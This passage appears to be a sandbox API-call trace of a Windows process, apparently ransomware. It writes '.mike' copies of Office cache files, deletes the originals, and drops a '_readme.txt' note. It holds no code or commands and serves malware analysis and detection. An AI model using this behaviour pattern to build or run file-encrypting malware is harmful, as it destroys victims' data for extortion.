lpFilePart=0x0) returned 0x4e [0040.474] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0040.474] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.mike", lpFilePart=0x0) returned 0x53 [0040.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0040.474] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0040.474] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.mike", lpFilePart=0x0) returned 0x53 [0040.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.474] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.474] GetFileType (hFile=0x264) returned 0x1 [0040.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.474] GetFileType (hFile=0x264) returned 0x1 [0040.474] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0040.474] WriteFile (in: hFile=0x264, lpBuffer=0x210b2a0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x210b2a0*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0040.475] CloseHandle (hObject=0x264) returned 1 [0040.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0040.475] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x210ad6c | out: lpFileInformation=0x210ad6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e345a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x4cf)) returned 1 [0040.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0040.476] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0040.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0040.476] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.476] GetFileType (hFile=0x264) returned 0x1 [0040.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0040.476] GetFileType (hFile=0x264) returned 0x1 [0040.476] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0040.476] ReadFile (in: hFile=0x264, lpBuffer=0x210c3e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x210c3e0*, lpNumberOfBytesRead=0x2af110*=0x4cf, lpOverlapped=0x0) returned 1 [0040.478] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.mike", lpFilePart=0x0) returned 0x53 [0040.478] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.478] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.478] GetFileType (hFile=0x264) returned 0x1 [0040.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.478] GetFileType (hFile=0x264) returned 0x1 [0040.478] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0040.478] WriteFile (in: hFile=0x264, lpBuffer=0x2110f68*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x2110f68*, lpNumberOfBytesWritten=0x2af104*=0x4d0, lpOverlapped=0x0) returned 1 [0040.478] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.mike", lpFilePart=0x0) returned 0x53 [0040.478] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0040.479] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.479] GetFileType (hFile=0x264) returned 0x1 [0040.479] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0040.479] GetFileType (hFile=0x264) returned 0x1 [0040.480] WriteFile (in: hFile=0x264, lpBuffer=0x21141a8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x21141a8*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0040.480] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0040.480] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.mike", lpFilePart=0x0) returned 0x53 [0040.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.480] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2544ec0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2544ec0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2544ec0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x6f0)) returned 1 [0040.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.480] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0040.480] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.mike", lpFilePart=0x0) returned 0x53 [0040.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.480] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2115978 | out: lpFileInformation=0x2115978*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2544ec0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2544ec0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2544ec0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x6f0)) returned 1 [0040.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.481] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0040.481] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", dwFileAttributes=0x80) returned 1 [0040.481] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0040.481] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml")) returned 1 [0040.482] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0040.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.482] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.482] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0040.482] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0040.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0040.482] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0040.482] GetFileType (hFile=0x264) returned 0x1 [0040.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0040.483] GetFileType (hFile=0x264) returned 0x1 [0040.483] WriteFile (in: hFile=0x264, lpBuffer=0x21176b0*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x21176b0*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0040.484] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.484] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.484] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.484] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0040.484] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.484] GetFileType (hFile=0x264) returned 0x1 [0040.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0040.484] GetFileType (hFile=0x264) returned 0x1 [0040.484] CloseHandle (hObject=0x264) returned 1 [0040.484] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.484] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.484] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0040.484] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0040.484] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0040.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.485] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2119684 | out: lpFileInformation=0x2119684*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c)) returned 1 [0040.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.485] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.485] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21199a0 | out: lpFileInformation=0x21199a0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c)) returned 1 [0040.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.485] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.485] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.485] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.485] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.485] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.486] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.486] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.486] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0040.486] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0040.486] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.486] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.486] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.492] GetFileType (hFile=0x264) returned 0x1 [0040.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.492] GetFileType (hFile=0x264) returned 0x1 [0040.492] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0040.492] WriteFile (in: hFile=0x264, lpBuffer=0x211a81c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x211a81c*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0040.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0040.493] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x211a324 | out: lpFileInformation=0x211a324*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c)) returned 1 [0040.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0040.493] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.493] SetThreadErrorMode (dwNewMode=0x1, 